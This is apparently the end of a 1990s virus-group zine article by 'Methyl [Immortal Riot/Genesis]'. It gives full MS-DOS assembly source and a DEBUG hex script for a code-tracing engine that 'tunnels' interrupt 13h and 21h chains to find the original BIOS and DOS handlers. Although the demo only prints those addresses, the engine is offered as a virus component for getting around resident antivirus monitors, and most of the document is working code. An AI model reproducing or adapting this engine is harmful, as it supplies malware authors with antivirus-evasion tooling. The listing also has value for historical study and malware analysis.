This document went through 3 complete rewrites, 5 major rewrites, and 3 main beta tests! The example CMT went through 2 complete rewrites and multiple seperate updates. The things I do for you people. Methyl [Immortal Riot/Genesis] ============================================================================= ;=[BEGIN TUNNEL.ASM]========================================================= ; ; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ; ³ Tunneling ³ ; ³ with ³ ; ³ Code Tracing ³ ; ³ EXAMPLE ³ ; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; ; I just whipped up this example program so you can see how the engine ; that I have provided you works on tunneling i13 and i21 on your system, ; obviously lots could be optimized but since this is just an example and ; not a virus, size doesn't really matter. ; ; Methyl [Immortal Riot/Genesis] org 0100h mov b[scan_type], 1 mov ah, 9 lea dx, [i13_info] int 021h call scan_setup call trace_info push cs pop ds mov b[scan_type], 0 mov ah, 9 lea dx, [i21_info] int 021h call scan_setup call trace_info mov ax, 04c00h int 021h trace_info: push ds push cs pop ds cmp bl, 0 je trace_okay mov ah, 9 lea dx, [trace_fuckup_msg] int 021h pop ds ret trace_okay: mov ah, 9 lea dx, [trace_okay_msg] int 021h pop bx push si call bin_2_hex call print_colon pop bx call bin_2_hex ret i13_info: db 'Interrupt 13h trace -$' i21_info: db 0dh, 0ah, 'Interrupt 21h trace -$' trace_fuckup_msg: db ' failed$' trace_okay_msg: db ' traced to $' bin_2_hex: mov ch, 4 rotate: mov cl, 4 rol bx, cl mov al, bl and al, 0fh add al, 030h cmp al, '9'+1 jl print_it add al, 07h print_it: mov dl, al mov ah, 2 int 021h dec ch jnz rotate ret print_colon: mov ah, 2 mov dl, ':' int 021h ret entry_ax dw 0 ; AX on entry to table decoding routine cmp_loops db 0 ; number of CMPs left to process need_fixup db 0 ; FIXUP flag table_decoder proc near push cs pop es mov [es:entry_ax], ax lea di, [instruction_table_start] jmp decode_start decode_equal: cmp [es:need_fixup], 0 je no_fixup mov ax, [es:entry_ax] and ah, 011000111xb cmp ah, 0110xb jne no_fixup add dl, 2 no_fixup: mov al, dl cbw xor bx, bx ret decode_error: mov ax, 1 mov bx, 1 ret decode_start: cmp di, offset instruction_table_end je decode_error mov ax, [es:entry_ax] mov bl, [es:di] and bl, 01111xb mov [es:cmp_loops], bl mov cl, [es:di] mov bl, [es:di] and cl, 001000000xb mov [es:need_fixup], cl inc di and bl, 010000000xb jz byte_entry word_entry: mov bx, [es:di] and ax, bx inc di inc di word_do_cmp: mov dl, [es:di] and dl, 01111xb mov bx, [es:di+1] cmp ax, bx je _decode_equal dec [es:cmp_loops] jz word_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bx, [es:di+3] cmp ax, bx je _decode_equal add di, 5 dec [es:cmp_loops] jnz word_do_cmp jmp decode_start word_next_first: add di, 3 jmp decode_start _decode_equal: jmp decode_equal byte_entry: mov bl, [es:di] and al, bl inc di byte_do_cmp: mov dl, [es:di] and dl, 01111xb mov bl, [es:di+1] cmp al, bl je _decode_equal dec [es:cmp_loops] jz byte_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bl, [es:di+2] cmp al, bl je _decode_equal add di, 3 dec [es:cmp_loops] jnz byte_do_cmp jmp decode_start byte_next_first: inc di inc di jmp decode_start table_decoder endp instruction_table_start: db 000000001xb db 011110000xb db 000000001xb db 010010000xb ; CBW/CWD/POPF/PUSHF/SAHF/WAIT/CWDE/LAHF ; XCHG [reg, accumulator] db 000000001xb db 011110110xb db 000000001xb db 011110100xb ; CLD/STD/CMC/HLT db 000000011xb db 011111100xb db 000100001xb db 011111000xb ; CLC/STC/CLI/STI db 011100000xb ; LOOP[N]E/JCXZ db 000000001xb db 011110000xb ; REP[NE]/LOCK db 000000001xb db 011110100xb db 000100001xb db 010100100xb ; CMPS[B|W]/MOVS[B|W]/LODS[B|W]/SCAS[B|W] db 000000001xb db 011100000xb db 000000001xb db 001000000xb ; [DEC|INC|PUSH|POP] register db 000000001xb db 011000110xb db 000000001xb db 000000110xb ; AAA/AAS/DAA/DAS ; PUSH/POP [segment register] db 000000001xb db 011111000xb db 000000001xb db 010010000xb ; XCHG [register, accumulator] / NOP db 000000001xb db 011111110xb db 000000010xb db 011010100xb ; AAD/AAM [including wierd format] db 000000001xb db 011111110xb db 000000001xb db 001100000xb ; [PUSH|POP]A db 000000001xb db 011111110xb db 000000001xb db 010011100xb ; [POPF|PUSHF] db 000000010xb db 011111100xb db 000100001xb db 011101100xb db 011100100xb ; [IN|OUT] variable port|fixed port db 000000010xb db 011111101xb db 000010010xb db 011001101xb db 011001100xb ; IRET|INT [variable|3|overflow] db 000000001xb db 011111110xb db 000000001xb db 010101010xb ; STOS[B|W] db 000000001xb db 011111111xb db 000000001xb db 011010111xb ; XLAT db 011000100xb db 011111000xb, 011000000xb db 000110010xb db 011011000xb, 000000000xb db 011011000xb, 001000000xb db 000100100xb db 011011000xb, 010000000xb db 011011000xb, 011000000xb ; ESC db 011000100xb db 011111110xb, 011000000xb db 000110010xb db 011000100xb, 000000000xb db 011000100xb, 001000000xb db 000100100xb db 011000100xb, 010000000xb db 011000100xb, 011000000xb ; LDS/LES db 011000100xb db 011111100xb, 011000000xb db 000110010xb db 010001000xb, 000000000xb db 010001000xb, 001000000xb db 000100100xb db 010001000xb, 010000000xb db 010001000xb, 011000000xb ; MOV [reg/mem] with register db 000000001xb db 011111100xb db 000000011xb db 010100000xb ; MOV memory with accumulator db 000000010xb db 011111000xb db 000100011xb db 010111000xb db 010110000xb ; MOV reg, immediate db 000000010xb db 011111111xb db 000110010xb db 010101000xb db 010101001xb ; TEST accumulator, immediate db 011000100xb db 011000100xb, 011000000xb db 000110010xb db 000000000xb, 000000000xb db 000000000xb, 001000000xb db 000100100xb db 000000000xb, 010000000xb db 000000000xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem] with register db 011000100xb db 011111100xb, 011000000xb db 000110010xb db 011010000xb, 000000000xb db 011010000xb, 001000000xb db 000100100xb db 011010000xb, 010000000xb db 011010000xb, 011000000xb ; [RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL] db 011000100xb db 011110100xb, 011000000xb db 000110010xb db 010000100xb, 000000000xb db 010000100xb, 001000000xb db 000100100xb db 010000100xb, 010000000xb db 010000100xb, 011000000xb ; XCHG/TEST/LEA/POP ; [register/memory], [register/memory] ; MOV [segreg/mem], [segreg/mem] db 011000100xb db 011111111xb, 011000000xb db 001000011xb db 010000011xb, 000000000xb db 010000011xb, 001000000xb db 000110110xb db 010000011xb, 010000000xb db 010000011xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (word) <-- WIERD format db 011001000xb db 011111101xb, 011000000xb db 001000011xb db 010000000xb, 000000000xb db 010000000xb, 001000000xb db 000110101xb db 010000000xb, 010000000xb db 010000000xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (byte) db 001010100xb db 010000001xb, 000000000xb db 010000001xb, 001000000xb db 001000110xb db 010000001xb, 010000000xb db 010000001xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (word) ; Make sure WIERD series is handled first db 011001000xb db 011111111xb, 011000000xb db 001000011xb db 011000110xb, 000000000xb db 011000110xb, 001000000xb db 000110101xb db 011000110xb, 010000000xb db 011000110xb, 011000000xb ; MOV [reg/mem], immediate (byte) db 001010100xb db 011000111xb, 000000000xb db 011000111xb, 001000000xb db 001000110xb db 011000111xb, 010000000xb db 011000111xb, 011000000xb ; MOV [reg/mem], immediate (word) db 011001000xb db 011111111xb, 011000000xb db 001000011xb db 011110110xb, 000000000xb db 011110110xb, 001000000xb db 000110101xb db 011110110xb, 010000000xb db 011110110xb, 011000000xb ; TEST [reg/mem], immediate (byte) db 001010100xb db 011110111xb, 000000000xb db 011110111xb, 001000000xb db 001000110xb db 011110111xb, 010000000xb db 011110111xb, 011000000xb ; TEST [reg/mem], immediate (word) db 000000010xb db 011000111xb db 000110010xb db 000000100xb db 000000101xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; acummulator, immediate db 011000100xb db 011110110xb, 011000000xb db 000110010xb db 011110110xb, 000000000xb db 011110110xb, 001000000xb db 000100100xb db 011110110xb, 010000000xb db 011110110xb, 011000000xb ; [CALL|DEC|INC|JMP|PUSH|???] reg/memory ; [NOT|NEG|MUL|DIV|IMUL|IDIV|???] reg/memory ; Also handles TEST by accident... so make ; sure this is *AFTER* TEST cases have been ; handled else we'll use the wrong formula instruction_table_end: scan_type db 0 ; 0 = interrupt 21h scan ; 1 = interrupt 13h scan stack_top dw 0 ; do not POP past this point stack_bottom dw 0 ; do not PUSH past this point override db 02eh ; segment overrides variable loop_counter dw 0300h ; how many instructions (loops) we've processed first_mcb dw 0 ; abort when our segment is below this value (INT 21) temp_ip dw 0 ; temporary storage for stack searching temp_store dw 0, 0 ; temporary storage for stack searching global dw 0 ; global abort counter scan_setup: mov [cs:stack_top], sp lea ax, [offset program_end+020h] mov [cs:stack_bottom], ax mov [cs:loop_counter], 0300h mov ax, 070h cmp b[cs:scan_type], 1 je scan_13_setup mov ah, 052h int 021h mov ax, [es:bx-2] scan_13_setup: mov [cs:first_mcb], ax mov ax, 03513h int 021h cmp b[cs:scan_type], 1 je scan_13_i_setup mov ax, 03521h int 021h scan_13_i_setup: push es pop ds xchg bx, si xor ax, ax push ax push ax push ax scan_begin: mov [cs:override], 02eh mov ax, ds cmp b[cs:scan_type], 1 je scan_13_test cmp ax, [cs:first_mcb] jae scan_prefix jmp scan_hit_exit scan_13_test: cmp ax, [cs:first_mcb] jne scan_prefix scan_hit_exit: mov bl, 0 mov sp, [cs:stack_top] ret scan_prefix: dec [cs:loop_counter] jz do_ret_far dec [cs:global] jz global_error cmp si, 0fff0h jae do_ret_far mov ax, [si] push ax and al, 011100111xb cmp al, 000100110xb ; check for segment overrides pop ax je prefix_found push ax and al, 011110000xb cmp al, 001110000xb ; check for conditional jump series pop ax jne scan_ret_opcode do_conditional_jump: mov ax, si inc ax inc ax call call_finish jmp do_jump_short prefix_found: mov [cs:override], al inc si jnc scan_prefix jmp do_ret_far global_error: mov bl, 2 mov sp, [cs:stack_top] ret scan_ret_opcode: cmp al, 0cfh je do_ret_far ; check for IRET push ax and al, 011110110xb cmp al, 011000010xb ; check for RET[N|F] pop ax jne scan_flow_opcodes do_ret_far: mov ax, sp add ax, 6 cmp ax, [cs:stack_top] jae scan_root_exit pop si pop ds pop [cs:loop_counter] jmp scan_begin scan_root_exit: mov bl, 1 mov sp, [cs:stack_top] ret do_jump_short: mov al, [si+1] cbw add si, ax inc si inc si jmp scan_begin do_jump_near_immed: add si, [si+1] add si, 3 jmp scan_begin do_jump_far_immed: mov ax, [si+3] mov si, [si+1] mov ds, ax jmp scan_begin do_jump_near_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov si, [si] jmp scan_begin do_jump_far_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov ax, [si+2] mov si, [si] mov ds, ax jmp scan_begin scan_flow_opcodes: cmp al, 0ebh je do_jump_short cmp al, 0e9h je do_jump_near_immed cmp al, 0eah je do_jump_far_immed cmp al, 0ffh jne scan_flow_opcodes_next push ax and ah, 0110000xb cmp ah, 0100000xb pop ax jne scan_flow_opcodes_next push ax and ah, 011000111xb cmp ah, 000000110xb pop ax jne _do_ret_far ; weird JMP/CALLs we can't handle (which use ; registers, weird offset bytes, etc, etc, etc) cmp ah, 026h je do_jump_near_mem cmp ah, 02eh je do_jump_far_mem cmp ah, 016h je do_call_near_mem cmp ah, 01eh je do_call_far_mem scan_flow_opcodes_next: cmp al, 0e8h je do_call_near_immed cmp al, 09ah je do_call_far_immed scan_unknown_opcodes: call table_decoder cmp bx, 0 jne _do_ret_far add si, ax jc _do_ret_far jmp scan_begin _do_ret_far: jmp do_ret_far do_call_near_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_near_mem do_call_near_immed: call call_setup add ax, 3 jc _do_ret_far call call_finish jmp do_jump_near_immed do_call_far_immed: call call_setup add ax, 5 jc _do_ret_far call call_finish jmp do_jump_far_immed do_call_far_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_far_mem call_setup: pop bx mov ax, sp sub ax, 6 cmp ax, [cs:stack_bottom] jbe _stack_error mov ax, si push bx ret _stack_error: mov bl, 3 mov sp, [cs:stack_top] ret call_finish: pop [cs:temp_ip] mov [cs:temp_store], ax mov [cs:temp_store+2], ds push ss pop ds xchg si, bp mov si, sp mov bx, si call_loop: lodsw cmp ax, [cs:temp_store] jne call_nomatch lodsw cmp ax, [cs:temp_store+2] je call_match_found call_nomatch: add bx, 6 mov si, bx cmp si, [cs:stack_top] jb call_loop call_exit: push [cs:loop_counter] mov ax, [cs:temp_store+2] push ax push [cs:temp_store] push [cs:temp_ip] xchg bp, si mov ds, ax ret call_match_found: mov si, [cs:temp_store] mov ax, [cs:temp_store+2] mov ds, ax jmp scan_begin program_end: ;=[END TUNNEL.ASM]=========================================================== ;=[BEGIN TUNNEL.SCR]========================================================= N TUNNEL.COM E 0100 C6 06 8B 03 01 B4 09 BA 50 01 CD 21 E8 8E 02 E8 E 0110 19 00 0E 1F C6 06 8B 03 00 B4 09 BA 66 01 CD 21 E 0120 E8 7A 02 E8 05 00 B8 00 4C CD 21 1E 0E 1F 80 FB E 0130 00 74 09 B4 09 BA 7E 01 CD 21 1F C3 B4 09 BA 86 E 0140 01 CD 21 5B 56 E8 4A 00 E8 64 00 5B E8 43 00 C3 E 0150 49 6E 74 65 72 72 75 70 74 20 31 33 68 20 74 72 E 0160 61 63 65 20 2D 24 0D 0A 49 6E 74 65 72 72 75 70 E 0170 74 20 32 31 68 20 74 72 61 63 65 20 2D 24 20 66 E 0180 61 69 6C 65 64 24 20 74 72 61 63 65 64 20 74 6F E 0190 20 24 B5 04 B1 04 D3 C3 8A C3 24 0F 04 30 3C 3A E 01A0 7C 02 04 07 8A D0 B4 02 CD 21 FE CD 75 E6 C3 B4 E 01B0 02 B2 3A CD 21 C3 00 00 00 00 0E 07 26 A3 B6 01 E 01C0 BF 8E 02 E9 24 00 26 80 3E B9 01 00 74 0F 26 A1 E 01D0 B6 01 80 E4 C7 80 FC 06 75 03 80 C2 02 8A C2 98 E 01E0 33 DB C3 B8 01 00 BB 01 00 C3 81 FF 8B 03 74 F3 E 01F0 26 A1 B6 01 26 8A 1D 80 E3 0F 26 88 1E B8 01 26 E 0200 8A 0D 26 8A 1D 80 E1 40 26 88 0E B9 01 47 80 E3 E 0210 80 74 3F 26 8B 1D 21 D8 47 47 26 8A 15 80 E2 0F E 0220 26 8B 5D 01 39 D8 74 27 26 FE 0E B8 01 74 1B 26 E 0230 8A 15 B1 04 D2 EA 26 8B 5D 03 39 D8 74 11 83 C7 E 0240 05 26 FE 0E B8 01 75 D2 EB A0 83 C7 03 EB 9B E9 E 0250 74 FF 26 8A 1D 20 D8 47 26 8A 15 80 E2 0F 26 8A E 0260 5D 01 38 D8 74 E9 26 FE 0E B8 01 74 1C 26 8A 15 E 0270 B1 04 D2 EA 26 8A 5D 02 38 D8 74 D3 83 C7 03 26 E 0280 FE 0E B8 01 75 D2 E9 61 FF 47 47 E9 5C FF 01 F0 E 0290 01 90 01 F6 01 F4 03 FC 21 F8 E0 01 F0 01 F4 21 E 02A0 A4 01 E0 01 40 01 C6 01 06 01 F8 01 90 01 FE 02 E 02B0 D4 01 FE 01 60 01 FE 01 9C 02 FC 21 EC E4 02 FD E 02C0 12 CD CC 01 FE 01 AA 01 FF 01 D7 C4 F8 C0 32 D8 E 02D0 00 D8 40 24 D8 80 D8 C0 C4 FE C0 32 C4 00 C4 40 E 02E0 24 C4 80 C4 C0 C4 FC C0 32 88 00 88 40 24 88 80 E 02F0 88 C0 01 FC 03 A0 02 F8 23 B8 B0 02 FF 32 A8 A9 E 0300 C4 C4 C0 32 00 00 00 40 24 00 80 00 C0 C4 FC C0 E 0310 32 D0 00 D0 40 24 D0 80 D0 C0 C4 F4 C0 32 84 00 E 0320 84 40 24 84 80 84 C0 C4 FF C0 43 83 00 83 40 36 E 0330 83 80 83 C0 C8 FD C0 43 80 00 80 40 35 80 80 80 E 0340 C0 54 81 00 81 40 46 81 80 81 C0 C8 FF C0 43 C6 E 0350 00 C6 40 35 C6 80 C6 C0 54 C7 00 C7 40 46 C7 80 E 0360 C7 C0 C8 FF C0 43 F6 00 F6 40 35 F6 80 F6 C0 54 E 0370 F7 00 F7 40 46 F7 80 F7 C0 02 C7 32 04 05 C4 F6 E 0380 C0 32 F6 00 F6 40 24 F6 80 F6 C0 00 00 00 00 00 E 0390 2E 00 03 00 00 00 00 00 00 00 00 00 00 2E 89 26 E 03A0 8C 03 B8 D6 05 2E A3 8E 03 2E C7 06 91 03 00 03 E 03B0 B8 70 00 2E 80 3E 8B 03 01 74 08 B4 52 CD 21 26 E 03C0 8B 47 FE 2E A3 93 03 B8 13 35 CD 21 2E 80 3E 8B E 03D0 03 01 74 05 B8 21 35 CD 21 06 1F 87 F3 33 C0 50 E 03E0 50 50 2E C6 06 90 03 2E 8C D8 2E 80 3E 8B 03 01 E 03F0 74 0A 2E 3B 06 93 03 73 12 E9 07 00 2E 3B 06 93 E 0400 03 75 08 B3 00 2E 8B 26 8C 03 C3 2E FF 0E 91 03 E 0410 74 46 2E FF 0E 9B 03 74 2B 83 FE F0 73 3A 8B 04 E 0420 50 24 E7 3C 26 58 74 12 50 24 F0 3C 70 58 75 1C E 0430 8B C6 40 40 E8 26 01 E9 3C 00 2E A2 90 03 46 73 E 0440 CA E9 14 00 B3 02 2E 8B 26 8C 03 C3 3C CF 74 08 E 0450 50 24 F6 3C C2 58 75 62 89 E0 05 06 00 2E 3B 06 E 0460 8C 03 73 0A 5E 1F 2E 8F 06 91 03 E9 74 FF B3 01 E 0470 2E 8B 26 8C 03 C3 8A 44 01 98 01 C6 46 46 E9 61 E 0480 FF 03 74 01 83 C6 03 E9 58 FF 8B 44 03 8B 74 01 E 0490 8E D8 E9 4D FF 2E 80 3E 90 03 2E 75 BB 8B 74 02 E 04A0 8B 34 E9 3D FF 2E 80 3E 90 03 2E 75 AB 8B 74 02 E 04B0 8B 44 02 8B 34 8E D8 E9 28 FF 3C EB 74 B8 3C E9 E 04C0 74 BF 3C EA 74 C4 3C FF 75 28 50 80 E4 30 80 FC E 04D0 20 58 75 1E 50 80 E4 C7 80 FC 06 58 75 2B 80 FC E 04E0 26 74 B2 80 FC 2E 74 BD 80 FC 16 74 1F 80 FC 1E E 04F0 74 44 3C E8 74 24 3C 9A 74 2E E8 BD FC 83 FB 00 E 0500 75 07 01 C6 72 03 E9 D9 FE E9 4C FF E8 35 00 05 E 0510 04 00 72 F5 E8 46 00 E9 7B FF E8 27 00 05 03 00 E 0520 72 E7 E8 38 00 E9 59 FF E8 19 00 05 05 00 72 D9 E 0530 E8 2A 00 E9 54 FF E8 0B 00 05 04 00 72 CB E8 1C E 0540 00 E9 61 FF 5B 89 E0 2D 06 00 2E 3B 06 8E 03 76 E 0550 04 8B C6 53 C3 B3 03 2E 8B 26 8C 03 C3 2E 8F 06 E 0560 95 03 2E A3 97 03 2E 8C 1E 99 03 16 1F 87 EE 8B E 0570 F4 89 F3 AD 2E 3B 06 97 03 75 08 AD 2E 3B 06 99 E 0580 03 74 25 83 C3 06 89 DE 2E 3B 36 8C 03 72 E4 2E E 0590 FF 36 91 03 2E A1 99 03 50 2E FF 36 97 03 2E FF E 05A0 36 95 03 87 F5 8E D8 C3 2E 8B 36 97 03 2E A1 99 E 05B0 03 8E D8 E9 2C FE RCX 04B6 W Q ;=[END TUNNEL.SCR]===========================================================